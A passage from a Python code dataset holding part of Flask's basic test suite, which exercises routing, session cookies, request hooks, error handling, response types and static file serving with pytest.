source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
test_basic.py
|
import gc
import re
import time
import uuid
import weakref
from datetime import datetime
from platform import python_implementation
from threading import Thread
import pytest
import werkzeug.serving
from werkzeug.exceptions import BadRequest
from werkzeug.exceptions import Forbidden
from werkzeug.exceptions import NotFound
from werkzeug.http import parse_date
from werkzeug.routing import BuildError
import flask
require_cpython_gc = pytest.mark.skipif(
python_implementation() != "CPython",
reason="Requires CPython GC behavior",
)
def test_options_work(app, client):
@app.route("/", methods=["GET", "POST"])
def index():
return "Hello World"
rv = client.open("/", method="OPTIONS")
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
assert rv.data == b""
def test_options_on_multiple_rules(app, client):
@app.route("/", methods=["GET", "POST"])
def index():
return "Hello World"
@app.route("/", methods=["PUT"])
def index_put():
return "Aha!"
rv = client.open("/", method="OPTIONS")
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST", "PUT"]
@pytest.mark.parametrize("method", ["get", "post", "put", "delete", "patch"])
def test_method_route(app, client, method):
method_route = getattr(app, method)
client_method = getattr(client, method)
@method_route("/")
def hello():
return "Hello"
assert client_method("/").data == b"Hello"
def test_method_route_no_methods(app):
with pytest.raises(TypeError):
app.get("/", methods=["GET", "POST"])
def test_provide_automatic_options_attr():
app = flask.Flask(__name__)
def index():
return "Hello World!"
index.provide_automatic_options = False
app.route("/")(index)
rv = app.test_client().open("/", method="OPTIONS")
assert rv.status_code == 405
app = flask.Flask(__name__)
def index2():
return "Hello World!"
index2.provide_automatic_options = True
app.route("/", methods=["OPTIONS"])(index2)
rv = app.test_client().open("/", method="OPTIONS")
assert sorted(rv.allow) == ["OPTIONS"]
def test_provide_automatic_options_kwarg(app, client):
def index():
return flask.request.method
def more():
return flask.request.method
app.add_url_rule("/", view_func=index, provide_automatic_options=False)
app.add_url_rule(
"/more",
view_func=more,
methods=["GET", "POST"],
provide_automatic_options=False,
)
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD"]
rv = client.open("/", method="OPTIONS")
assert rv.status_code == 405
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "POST"]
rv = client.open("/more", method="OPTIONS")
assert rv.status_code == 405
def test_request_dispatching(app, client):
@app.route("/")
def index():
return flask.request.method
@app.route("/more", methods=["GET", "POST"])
def more():
return flask.request.method
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS"]
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
def test_disallow_string_for_allowed_methods(app):
with pytest.raises(TypeError):
@app.route("/", methods="GET POST")
def index():
return "Hey"
def test_url_mapping(app, client):
random_uuid4 = "7eb41166-9ebf-4d26-b771-ea3f54f8b383"
def index():
return flask.request.method
def more():
return flask.request.method
def options():
return random_uuid4
app.add_url_rule("/", "index", index)
app.add_url_rule("/more", "more", more, methods=["GET", "POST"])
# Issue 1288: Test that automatic options are not added
# when non-uppercase 'options' in methods
app.add_url_rule("/options", "options", options, methods=["options"])
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS"]
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
rv = client.open("/options", method="OPTIONS")
assert rv.status_code == 200
assert random_uuid4 in rv.data.decode("utf-8")
def test_werkzeug_routing(app, client):
from werkzeug.routing import Submount, Rule
app.url_map.add(
Submount("/foo", [Rule("/bar", endpoint="bar"), Rule("/", endpoint="index")])
)
def bar():
return "bar"
def index():
return "index"
app.view_functions["bar"] = bar
app.view_functions["index"] = index
assert client.get("/foo/").data == b"index"
assert client.get("/foo/bar").data == b"bar"
def test_endpoint_decorator(app, client):
from werkzeug.routing import Submount, Rule
app.url_map.add(
Submount("/foo", [Rule("/bar", endpoint="bar"), Rule("/", endpoint="index")])
)
@app.endpoint("bar")
def bar():
return "bar"
@app.endpoint("index")
def index():
return "index"
assert client.get("/foo/").data == b"index"
assert client.get("/foo/bar").data == b"bar"
def test_session(app, client):
@app.route("/set", methods=["POST"])
def set():
assert not flask.session.accessed
assert not flask.session.modified
flask.session["value"] = flask.request.form["value"]
assert flask.session.accessed
assert flask.session.modified
return "value set"
@app.route("/get")
def get():
assert not flask.session.accessed
assert not flask.session.modified
v = flask.session.get("value", "None")
assert flask.session.accessed
assert not flask.session.modified
return v
assert client.post("/set", data={"value": "42"}).data == b"value set"
assert client.get("/get").data == b"42"
def test_session_using_server_name(app, client):
app.config.update(SERVER_NAME="example.com")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com/")
assert "domain=.example.com" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_server_name_and_port(app, client):
app.config.update(SERVER_NAME="example.com:8080")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/")
assert "domain=.example.com" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_server_name_port_and_path(app, client):
app.config.update(SERVER_NAME="example.com:8080", APPLICATION_ROOT="/foo")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/foo")
assert "domain=example.com" in rv.headers["set-cookie"].lower()
assert "path=/foo" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_application_root(app, client):
class PrefixPathMiddleware:
def __init__(self, app, prefix):
self.app = app
self.prefix = prefix
def __call__(self, environ, start_response):
environ["SCRIPT_NAME"] = self.prefix
return self.app(environ, start_response)
app.wsgi_app = PrefixPathMiddleware(app.wsgi_app, "/bar")
app.config.update(APPLICATION_ROOT="/bar")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/")
assert "path=/bar" in rv.headers["set-cookie"].lower()
def test_session_using_session_settings(app, client):
app.config.update(
SERVER_NAME="www.example.com:8080",
APPLICATION_ROOT="/test",
SESSION_COOKIE_DOMAIN=".example.com",
SESSION_COOKIE_HTTPONLY=False,
SESSION_COOKIE_SECURE=True,
SESSION_COOKIE_SAMESITE="Lax",
SESSION_COOKIE_PATH="/",
)
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://www.example.com:8080/test/")
cookie = rv.headers["set-cookie"].lower()
assert "domain=.example.com" in cookie
assert "path=/" in cookie
assert "secure" in cookie
assert "httponly" not in cookie
assert "samesite" in cookie
@app.route("/clear")
def clear():
flask.session.pop("testing", None)
return "Goodbye World"
rv = client.get("/clear", "http://www.example.com:8080/test/")
cookie = rv.headers["set-cookie"].lower()
assert "session=;" in cookie
assert "domain=.example.com" in cookie
assert "path=/" in cookie
assert "secure" in cookie
assert "samesite" in cookie
def test_session_using_samesite_attribute(app, client):
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
app.config.update(SESSION_COOKIE_SAMESITE="invalid")
with pytest.raises(ValueError):
client.get("/")
app.config.update(SESSION_COOKIE_SAMESITE=None)
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite" not in cookie
app.config.update(SESSION_COOKIE_SAMESITE="Strict")
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite=strict" in cookie
app.config.update(SESSION_COOKIE_SAMESITE="Lax")
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite=lax" in cookie
def test_session_localhost_warning(recwarn, app, client):
app.config.update(SERVER_NAME="localhost:5000")
@app.route("/")
def index():
flask.session["testing"] = 42
return "testing"
rv = client.get("/", "http://localhost:5000/")
assert "domain" not in rv.headers["set-cookie"].lower()
w = recwarn.pop(UserWarning)
assert "'localhost' is not a valid cookie domain" in str(w.message)
def test_session_ip_warning(recwarn, app, client):
app.config.update(SERVER_NAME="127.0.0.1:5000")
@app.route("/")
def index():
flask.session["testing"] = 42
return "testing"
rv = client.get("/", "http://127.0.0.1:5000/")
assert "domain=127.0.0.1" in rv.headers["set-cookie"].lower()
w = recwarn.pop(UserWarning)
assert "cookie domain is an IP" in str(w.message)
def test_missing_session(app):
app.secret_key = None
def expect_exception(f, *args, **kwargs):
e = pytest.raises(RuntimeError, f, *args, **kwargs)
assert e.value.args and "session is unavailable" in e.value.args[0]
with app.test_request_context():
assert flask.session.get("missing_key") is None
expect_exception(flask.session.__setitem__, "foo", 42)
expect_exception(flask.session.pop, "foo")
def test_session_expiration(app, client):
permanent = True
@app.route("/")
def index():
flask.session["test"] = 42
flask.session.permanent = permanent
return ""
@app.route("/test")
def test():
return str(flask.session.permanent)
rv = client.get("/")
assert "set-cookie" in rv.headers
match = re.search(r"(?i)\bexpires=([^;]+)", rv.headers["set-cookie"])
expires = parse_date(match.group())
expected = datetime.utcnow() + app.permanent_session_lifetime
assert expires.year == expected.year
assert expires.month == expected.month
assert expires.day == expected.day
rv = client.get("/test")
assert rv.data == b"True"
permanent = False
rv = client.get("/")
assert "set-cookie" in rv.headers
match = re.search(r"\bexpires=([^;]+)", rv.headers["set-cookie"])
assert match is None
def test_session_stored_last(app, client):
@app.after_request
def modify_session(response):
flask.session["foo"] = 42
return response
@app.route("/")
def dump_session_contents():
return repr(flask.session.get("foo"))
assert client.get("/").data == b"None"
assert client.get("/").data == b"42"
def test_session_special_types(app, client):
now = datetime.utcnow().replace(microsecond=0)
the_uuid = uuid.uuid4()
@app.route("/")
def dump_session_contents():
flask.session["t"] = (1, 2, 3)
flask.session["b"] = b"\xff"
flask.session["m"] = flask.Markup("<html>")
flask.session["u"] = the_uuid
flask.session["d"] = now
flask.session["t_tag"] = {" t": "not-a-tuple"}
flask.session["di_t_tag"] = {" t__": "not-a-tuple"}
flask.session["di_tag"] = {" di": "not-a-dict"}
return "", 204
with client:
client.get("/")
s = flask.session
assert s["t"] == (1, 2, 3)
assert type(s["b"]) == bytes
assert s["b"] == b"\xff"
assert type(s["m"]) == flask.Markup
assert s["m"] == flask.Markup("<html>")
assert s["u"] == the_uuid
assert s["d"] == now
assert s["t_tag"] == {" t": "not-a-tuple"}
assert s["di_t_tag"] == {" t__": "not-a-tuple"}
assert s["di_tag"] == {" di": "not-a-dict"}
def test_session_cookie_setting(app):
is_permanent = True
@app.route("/bump")
def bump():
rv = flask.session["foo"] = flask.session.get("foo", 0) + 1
flask.session.permanent = is_permanent
return str(rv)
@app.route("/read")
def read():
return str(flask.session.get("foo", 0))
def run_test(expect_header):
with app.test_client() as c:
assert c.get("/bump").data == b"1"
assert c.get("/bump").data == b"2"
assert c.get("/bump").data == b"3"
rv = c.get("/read")
set_cookie = rv.headers.get("set-cookie")
assert (set_cookie is not None) == expect_header
assert rv.data == b"3"
is_permanent = True
app.config["SESSION_REFRESH_EACH_REQUEST"] = True
run_test(expect_header=True)
is_permanent = True
app.config["SESSION_REFRESH_EACH_REQUEST"] = False
run_test(expect_header=False)
is_permanent = False
app.config["SESSION_REFRESH_EACH_REQUEST"] = True
run_test(expect_header=False)
is_permanent = False
app.config["SESSION_REFRESH_EACH_REQUEST"] = False
run_test(expect_header=False)
def test_session_vary_cookie(app, client):
@app.route("/set")
def set_session():
flask.session["test"] = "test"
return ""
@app.route("/get")
def get():
return flask.session.get("test")
@app.route("/getitem")
def getitem():
return flask.session["test"]
@app.route("/setdefault")
def setdefault():
return flask.session.setdefault("test", "default")
@app.route("/vary-cookie-header-set")
def vary_cookie_header_set():
response = flask.Response()
response.vary.add("Cookie")
flask.session["test"] = "test"
return response
@app.route("/vary-header-set")
def vary_header_set():
response = flask.Response()
response.vary.update(("Accept-Encoding", "Accept-Language"))
flask.session["test"] = "test"
return response
@app.route("/no-vary-header")
def no_vary_header():
return ""
def expect(path, header_value="Cookie"):
rv = client.get(path)
if header_value:
# The 'Vary' key should exist in the headers only once.
assert len(rv.headers.get_all("Vary")) == 1
assert rv.headers["Vary"] == header_value
else:
assert "Vary" not in rv.headers
expect("/set")
expect("/get")
expect("/getitem")
expect("/setdefault")
expect("/vary-cookie-header-set")
expect("/vary-header-set", "Accept-Encoding, Accept-Language, Cookie")
expect("/no-vary-header", None)
def test_flashes(app, req_ctx):
assert not flask.session.modified
flask.flash("Zap")
flask.session.modified = False
flask.flash("Zip")
assert flask.session.modified
assert list(flask.get_flashed_messages()) == ["Zap", "Zip"]
def test_extended_flashing(app):
# Be sure app.testing=True below, else tests can fail silently.
#
# Specifically, if app.testing is not set to True, the AssertionErrors
# in the view functions will cause a 500 response to the test client
# instead of propagating exceptions.
@app.route("/")
def index():
flask.flash("Hello World")
flask.flash("Hello World", "error")
flask.flash(flask.Markup("<em>Testing</em>"), "warning")
return ""
@app.route("/test/")
def test():
messages = flask.get_flashed_messages()
assert list(messages) == [
"Hello World",
"Hello World",
flask.Markup("<em>Testing</em>"),
]
return ""
@app.route("/test_with_categories/")
def test_with_categories():
messages = flask.get_flashed_messages(with_categories=True)
assert len(messages) == 3
assert list(messages) == [
("message", "Hello World"),
("error", "Hello World"),
("warning", flask.Markup("<em>Testing</em>")),
]
return ""
@app.route("/test_filter/")
def test_filter():
messages = flask.get_flashed_messages(
category_filter=["message"], with_categories=True
)
assert list(messages) == [("message", "Hello World")]
return ""
@app.route("/test_filters/")
def test_filters():
messages = flask.get_flashed_messages(
category_filter=["message", "warning"], with_categories=True
)
assert list(messages) == [
("message", "Hello World"),
("warning", flask.Markup("<em>Testing</em>")),
]
return ""
@app.route("/test_filters_without_returning_categories/")
def test_filters2():
messages = flask.get_flashed_messages(category_filter=["message", "warning"])
assert len(messages) == 2
assert messages[0] == "Hello World"
assert messages[1] == flask.Markup("<em>Testing</em>")
return ""
# Create new test client on each test to clean flashed messages.
client = app.test_client()
client.get("/")
client.get("/test_with_categories/")
client = app.test_client()
client.get("/")
client.get("/test_filter/")
client = app.test_client()
client.get("/")
client.get("/test_filters/")
client = app.test_client()
client.get("/")
client.get("/test_filters_without_returning_categories/")
def test_request_processing(app, client):
evts = []
@app.before_request
def before_request():
evts.append("before")
@app.after_request
def after_request(response):
response.data += b"|after"
evts.append("after")
return response
@app.route("/")
def index():
assert "before" in evts
assert "after" not in evts
return "request"
assert "after" not in evts
rv = client.get("/").data
assert "after" in evts
assert rv == b"request|after"
def test_request_preprocessing_early_return(app, client):
evts = []
@app.before_request
def before_request1():
evts.append(1)
@app.before_request
def before_request2():
evts.append(2)
return "hello"
@app.before_request
def before_request3():
evts.append(3)
return "bye"
@app.route("/")
def index():
evts.append("index")
return "damnit"
rv = client.get("/").data.strip()
assert rv == b"hello"
assert evts == [1, 2]
def test_after_request_processing(app, client):
@app.route("/")
def index():
@flask.after_this_request
def foo(response):
response.headers["X-Foo"] = "a header"
return response
return "Test"
resp = client.get("/")
assert resp.status_code == 200
assert resp.headers["X-Foo"] == "a header"
def test_teardown_request_handler(app, client):
called = []
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route("/")
def root():
return "Response"
rv = client.get("/")
assert rv.status_code == 200
assert b"Response" in rv.data
assert len(called) == 1
def test_teardown_request_handler_debug_mode(app, client):
called = []
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route("/")
def root():
return "Response"
rv = client.get("/")
assert rv.status_code == 200
assert b"Response" in rv.data
assert len(called) == 1
def test_teardown_request_handler_error(app, client):
called = []
app.testing = False
@app.teardown_request
def teardown_request1(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except Exception:
pass
@app.teardown_request
def teardown_request2(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except Exception:
pass
@app.route("/")
def fails():
1 // 0
rv = client.get("/")
assert rv.status_code == 500
assert b"Internal Server Error" in rv.data
assert len(called) == 2
def test_before_after_request_order(app, client):
called = []
@app.before_request
def before1():
called.append(1)
@app.before_request
def before2():
called.append(2)
@app.after_request
def after1(response):
called.append(4)
return response
@app.after_request
def after2(response):
called.append(3)
return response
@app.teardown_request
def finish1(exc):
called.append(6)
@app.teardown_request
def finish2(exc):
called.append(5)
@app.route("/")
def index():
return "42"
rv = client.get("/")
assert rv.data == b"42"
assert called == [1, 2, 3, 4, 5, 6]
def test_error_handling(app, client):
app.testing = False
@app.errorhandler(404)
def not_found(e):
return "not found", 404
@app.errorhandler(500)
def internal_server_error(e):
return "internal server error", 500
@app.errorhandler(Forbidden)
def forbidden(e):
return "forbidden", 403
@app.route("/")
def index():
flask.abort(404)
@app.route("/error")
def error():
1 // 0
@app.route("/forbidden")
def error2():
flask.abort(403)
rv = client.get("/")
assert rv.status_code == 404
assert rv.data == b"not found"
rv = client.get("/error")
assert rv.status_code == 500
assert b"internal server error" == rv.data
rv = client.get("/forbidden")
assert rv.status_code == 403
assert b"forbidden" == rv.data
def test_error_handler_unknown_code(app):
with pytest.raises(KeyError) as exc_info:
app.register_error_handler(999, lambda e: ("999", 999))
assert "Use a subclass" in exc_info.value.args[0]
def test_error_handling_processing(app, client):
app.testing = False
@app.errorhandler(500)
def internal_server_error(e):
return "internal server error", 500
@app.route("/")
def broken_func():
1 // 0
@app.after_request
def after_request(resp):
resp.mimetype = "text/x-special"
return resp
resp = client.get("/")
assert resp.mimetype == "text/x-special"
assert resp.data == b"internal server error"
def test_baseexception_error_handling(app, client):
app.testing = False
@app.route("/")
def broken_func():
raise KeyboardInterrupt()
with pytest.raises(KeyboardInterrupt):
client.get("/")
ctx = flask._request_ctx_stack.top
assert ctx.preserved
assert type(ctx._preserved_exc) is KeyboardInterrupt
def test_before_request_and_routing_errors(app, client):
@app.before_request
def attach_something():
flask.g.something = "value"
@app.errorhandler(404)
def return_something(error):
return flask.g.something, 404
rv = client.get("/")
assert rv.status_code == 404
assert rv.data == b"value"
def test_user_error_handling(app, client):
class MyException(Exception):
pass
@app.errorhandler(MyException)
def handle_my_exception(e):
assert isinstance(e, MyException)
return "42"
@app.route("/")
def index():
raise MyException()
assert client.get("/").data == b"42"
def test_http_error_subclass_handling(app, client):
class ForbiddenSubclass(Forbidden):
pass
@app.errorhandler(ForbiddenSubclass)
def handle_forbidden_subclass(e):
assert isinstance(e, ForbiddenSubclass)
return "banana"
@app.errorhandler(403)
def handle_403(e):
assert not isinstance(e, ForbiddenSubclass)
assert isinstance(e, Forbidden)
return "apple"
@app.route("/1")
def index1():
raise ForbiddenSubclass()
@app.route("/2")
def index2():
flask.abort(403)
@app.route("/3")
def index3():
raise Forbidden()
assert client.get("/1").data == b"banana"
assert client.get("/2").data == b"apple"
assert client.get("/3").data == b"apple"
def test_errorhandler_precedence(app, client):
class E1(Exception):
pass
class E2(Exception):
pass
class E3(E1, E2):
pass
@app.errorhandler(E2)
def handle_e2(e):
return "E2"
@app.errorhandler(Exception)
def handle_exception(e):
return "Exception"
@app.route("/E1")
def raise_e1():
raise E1
@app.route("/E3")
def raise_e3():
raise E3
rv = client.get("/E1")
assert rv.data == b"Exception"
rv = client.get("/E3")
assert rv.data == b"E2"
def test_trapping_of_bad_request_key_errors(app, client):
@app.route("/key")
def fail():
flask.request.form["missing_key"]
@app.route("/abort")
def allow_abort():
flask.abort(400)
rv = client.get("/key")
assert rv.status_code == 400
assert b"missing_key" not in rv.data
rv = client.get("/abort")
assert rv.status_code == 400
app.debug = True
with pytest.raises(KeyError) as e:
client.get("/key")
assert e.errisinstance(BadRequest)
assert "missing_key" in e.value.get_description()
rv = client.get("/abort")
assert rv.status_code == 400
app.debug = False
app.config["TRAP_BAD_REQUEST_ERRORS"] = True
with pytest.raises(KeyError):
client.get("/key")
with pytest.raises(BadRequest):
client.get("/abort")
def test_trapping_of_all_http_exceptions(app, client):
app.config["TRAP_HTTP_EXCEPTIONS"] = True
@app.route("/fail")
def fail():
flask.abort(404)
with pytest.raises(NotFound):
client.get("/fail")
def test_error_handler_after_processor_error(app, client):
app.testing = False
@app.before_request
def before_request():
if _trigger == "before":
1 // 0
@app.after_request
def after_request(response):
if _trigger == "after":
1 // 0
return response
@app.route("/")
def index():
return "Foo"
@app.errorhandler(500)
def internal_server_error(e):
return "Hello Server Error", 500
for _trigger in "before", "after":
rv = client.get("/")
assert rv.status_code == 500
assert rv.data == b"Hello Server Error"
def test_enctype_debug_helper(app, client):
from flask.debughelpers import DebugFilesKeyError
app.debug = True
@app.route("/fail", methods=["POST"])
def index():
return flask.request.files["foo"].filename
# with statement is important because we leave an exception on the
# stack otherwise and we want to ensure that this is not the case
# to not negatively affect other tests.
with client:
with pytest.raises(DebugFilesKeyError) as e:
client.post("/fail", data={"foo": "index.txt"})
assert "no file contents were transmitted" in str(e.value)
assert "This was submitted: 'index.txt'" in str(e.value)
def test_response_types(app, client):
@app.route("/text")
def from_text():
return "Hällo Wörld"
@app.route("/bytes")
def from_bytes():
return "Hällo Wörld".encode()
@app.route("/full_tuple")
def from_full_tuple():
return (
"Meh",
400,
{"X-Foo": "Testing", "Content-Type": "text/plain; charset=utf-8"},
)
@app.route("/text_headers")
def from_text_headers():
return "Hello", {"X-Foo": "Test", "Content-Type": "text/plain; charset=utf-8"}
@app.route("/text_status")
def from_text_status():
return "Hi, status!", 400
@app.route("/response_headers")
def from_response_headers():
return (
flask.Response(
"Hello world", 404, {"Content-Type": "text/html", "X-Foo": "Baz"}
),
{"Content-Type": "text/plain", "X-Foo": "Bar", "X-Bar": "Foo"},
)
@app.route("/response_status")
def from_response_status():
return app.response_class("Hello world", 400), 500
@app.route("/wsgi")
def from_wsgi():
return NotFound()
@app.route("/dict")
def from_dict():
return {"foo": "bar"}, 201
assert client.get("/text").data == "Hällo Wörld".encode()
assert client.get("/bytes").data == "Hällo Wörld".encode()
rv = client.get("/full_tuple")
assert rv.data == b"Meh"
assert rv.headers["X-Foo"] == "Testing"
assert rv.status_code == 400
assert rv.mimetype == "text/plain"
rv = client.get("/text_headers")
assert rv.data == b"Hello"
assert rv.headers["X-Foo"] == "Test"
assert rv.status_code == 200
assert rv.mimetype == "text/plain"
rv = client.get("/text_status")
assert rv.data == b"Hi, status!"
assert rv.status_code == 400
assert rv.mimetype == "text/html"
rv = client.get("/response_headers")
assert rv.data == b"Hello world"
assert rv.content_type == "text/plain"
assert rv.headers.getlist("X-Foo") == ["Bar"]
assert rv.headers["X-Bar"] == "Foo"
assert rv.status_code == 404
rv = client.get("/response_status")
assert rv.data == b"Hello world"
assert rv.status_code == 500
rv = client.get("/wsgi")
assert b"Not Found" in rv.data
assert rv.status_code == 404
rv = client.get("/dict")
assert rv.json == {"foo": "bar"}
assert rv.status_code == 201
def test_response_type_errors():
app = flask.Flask(__name__)
app.testing = True
@app.route("/none")
def from_none():
pass
@app.route("/small_tuple")
def from_small_tuple():
return ("Hello",)
@app.route("/large_tuple")
def from_large_tuple():
return "Hello", 234, {"X-Foo": "Bar"}, "???"
@app.route("/bad_type")
def from_bad_type():
return True
@app.route("/bad_wsgi")
def from_bad_wsgi():
return lambda: None
c = app.test_client()
with pytest.raises(TypeError) as e:
c.get("/none")
assert "returned None" in str(e.value)
assert "from_none" in str(e.value)
with pytest.raises(TypeError) as e:
c.get("/small_tuple")
assert "tuple must have the form" in str(e.value)
pytest.raises(TypeError, c.get, "/large_tuple")
with pytest.raises(TypeError) as e:
c.get("/bad_type")
assert "it was a bool" in str(e.value)
pytest.raises(TypeError, c.get, "/bad_wsgi")
def test_make_response(app, req_ctx):
rv = flask.make_response()
assert rv.status_code == 200
assert rv.data == b""
assert rv.mimetype == "text/html"
rv = flask.make_response("Awesome")
assert rv.status_code == 200
assert rv.data == b"Awesome"
assert rv.mimetype == "text/html"
rv = flask.make_response("W00t", 404)
assert rv.status_code == 404
assert rv.data == b"W00t"
assert rv.mimetype == "text/html"
def test_make_response_with_response_instance(app, req_ctx):
rv = flask.make_response(flask.jsonify({"msg": "W00t"}), 400)
assert rv.status_code == 400
assert rv.data == b'{"msg":"W00t"}\n'
assert rv.mimetype == "application/json"
rv = flask.make_response(flask.Response(""), 400)
assert rv.status_code == 400
assert rv.data == b""
assert rv.mimetype == "text/html"
rv = flask.make_response(
flask.Response("", headers={"Content-Type": "text/html"}),
400,
[("X-Foo", "bar")],
)
assert rv.status_code == 400
assert rv.headers["Content-Type"] == "text/html"
assert rv.headers["X-Foo"] == "bar"
def test_jsonify_no_prettyprint(app, req_ctx):
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": False})
compressed_msg = b'{"msg":{"submsg":"W00t"},"msg2":"foobar"}\n'
uncompressed_msg = {"msg": {"submsg": "W00t"}, "msg2": "foobar"}
rv = flask.make_response(flask.jsonify(uncompressed_msg), 200)
assert rv.data == compressed_msg
def test_jsonify_prettyprint(app, req_ctx):
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": True})
compressed_msg = {"msg": {"submsg": "W00t"}, "msg2": "foobar"}
pretty_response = (
b'{\n "msg": {\n "submsg": "W00t"\n }, \n "msg2": "foobar"\n}\n'
)
rv = flask.make_response(flask.jsonify(compressed_msg), 200)
assert rv.data == pretty_response
def test_jsonify_mimetype(app, req_ctx):
app.config.update({"JSONIFY_MIMETYPE": "application/vnd.api+json"})
msg = {"msg": {"submsg": "W00t"}}
rv = flask.make_response(flask.jsonify(msg), 200)
assert rv.mimetype == "application/vnd.api+json"
def test_json_dump_dataclass(app, req_ctx):
from dataclasses import make_dataclass
Data = make_dataclass("Data", [("name", str)])
value = flask.json.dumps(Data("Flask"), app=app)
value = flask.json.loads(value, app=app)
assert value == {"name": "Flask"}
def test_jsonify_args_and_kwargs_check(app, req_ctx):
with pytest.raises(TypeError) as e:
flask.jsonify("fake args", kwargs="fake")
assert "behavior undefined" in str(e.value)
def test_url_generation(app, req_ctx):
@app.route("/hello/<name>", methods=["POST"])
def hello():
pass
assert flask.url_for("hello", name="test x") == "/hello/test%20x"
assert (
flask.url_for("hello", name="test x", _external=True)
== "http://localhost/hello/test%20x"
)
def test_build_error_handler(app):
# Test base case, a URL which results in a BuildError.
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, "spam")
# Verify the error is re-raised if not the current exception.
try:
with app.test_request_context():
flask.url_for("spam")
except BuildError as err:
error = err
try:
raise RuntimeError("Test case where BuildError is not current.")
except RuntimeError:
pytest.raises(BuildError, app.handle_url_build_error, error, "spam", {})
# Test a custom handler.
def handler(error, endpoint, values):
# Just a test.
return "/test_handler/"
app.url_build_error_handlers.append(handler)
with app.test_request_context():
assert flask.url_for("spam") == "/test_handler/"
def test_build_error_handler_reraise(app):
# Test a custom handler which reraises the BuildError
def handler_raises_build_error(error, endpoint, values):
raise error
app.url_build_error_handlers.append(handler_raises_build_error)
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, "not.existing")
def test_url_for_passes_special_values_to_build_error_handler(app):
@app.url_build_error_handlers.append
def handler(error, endpoint, values):
assert values == {
"_external": False,
"_anchor": None,
"_method": None,
"_scheme": None,
}
return "handled"
with app.test_request_context():
flask.url_for("/")
def test_static_files(app, client):
rv = client.get("/static/index.html")
assert rv.status_code == 200
assert rv.data.strip() == b"<h1>Hello World!</h1>"
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/static/index.html"
rv.close()
def test_static_url_path():
app = flask.Flask(__name__, static_url_path="/foo")
app.testing = True
rv = app.test_client().get("/foo/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/foo/index.html"
def test_static_url_path_with_ending_slash():
app = flask.Flask(__name__, static_url_path="/foo/")
app.testing = True
rv = app.test_client().get("/foo/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/foo/index.html"
def test_static_url_empty_path(app):
app = flask.Flask(__name__, static_folder="", static_url_path="")
rv = app.test_client().open("/static/index.html", method="GET")
assert rv.status_code == 200
rv.close()
def test_static_url_empty_path_default(app):
app = flask.Flask(__name__, static_folder="")
rv = app.test_client().open("/static/index.html", method="GET")
assert rv.status_code == 200
rv.close()
def test_static_folder_with_pathlib_path(app):
from pathlib import Path
app = flask.Flask(__name__, static_folder=Path("static"))
rv = app.test_client().open("/static/index.html", method="GET")
assert rv.status_code == 200
rv.close()
def test_static_folder_with_ending_slash():
app = flask.Flask(__name__, static_folder="static/")
@app.route("/<path:path>")
def catch_all(path):
return path
rv = app.test_client().get("/catch/all")
assert rv.data == b"catch/all"
def test_static_route_with_host_matching():
app = flask.Flask(__name__, host_matching=True, static_host="example.com")
c = app.test_client()
rv = c.get("http://example.com/static/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
rv = flask.url_for("static", filename="index.html", _external=True)
assert rv == "http://example.com/static/index.html"
# Providing static_host without host_matching=True should error.
with pytest.raises(Exception):
flask.Flask(__name__, static_host="example.com")
# Providing host_matching=True with static_folder
# but without static_host should error.
with pytest.raises(Exception):
flask.Flask(__name__, host_matching=True)
# Providing host_matching=True without static_host
# but with static_folder=None should not error.
